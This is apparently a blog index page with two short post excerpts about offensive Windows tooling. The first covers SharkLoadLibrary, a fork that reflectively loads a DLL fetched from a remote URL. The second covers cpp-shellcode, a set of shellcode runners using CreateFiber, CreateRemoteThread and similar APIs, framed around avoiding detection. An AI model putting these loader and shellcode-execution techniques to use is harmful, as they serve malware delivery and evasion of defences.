SharkLoadLibrary

SharkLoadLibrary 是 DarkLoadLibrary 的完整版 在DarkLoadLibrary中的darkloadlibrary.h文件中, 作者定义了一组宏, 用于Control Flags #define LOAD_LOCAL_FILE 0x00000001 #define LOAD_REMOTE_FILE 0x00000002 #define LOAD_MEMORY 0x00000003 #define NO_LINK 0x00010000 可以看到, 作者早就定义好了LOAD_REMOTE_FILE的宏, 只不过在公开项目时删除了相关功能我将功能完善了, 开源在github供大家使用: SharkLoadLibrary 以下是项目介绍: LoadLibrary for Children’s Paradise. :sailboat: Folk From DarkLoadLibrary and thanks. Feature New feature: LOAD_REMOTE_FILE Usage PDARKMODULE DarkModule = DarkLoadLibrary( LOAD_REMOTE_FILE, // control flags "http://xxxx/demo.dll", // remote dll url, if loading from remote NULL, // dll buffer to load from if loading from memory 0, // dll size if loading from memory "Demo" // dll name if loaded from memory and remote ); Build && Test Environmental requirements libcurl Install from vcpkg: ....

December 26, 2022 · b1n

Cpp Shellcode

I made a repository of Windows Shellcode runners: cpp-shellcode. Here are some introductions: cpp-shellcode is A repository of Windows Shellcode runners. The applications load and execute Shellcode using various API calls or techniques. ❤️ THANKS @go-shellcode The available Shellcode runners include: CreateFiber CreateRemoteThread CreateThread EtwpCreateEtwThread NtQueueApcThreadEx-Local CreateFiber This application leverages the Windows CreateFiber function from the Kernel32.dll to execute shellcode within this application’s process. This is usefull when you want to avoid remote process injection and want to avoid calling CreateThread....

December 24, 2022 · b1n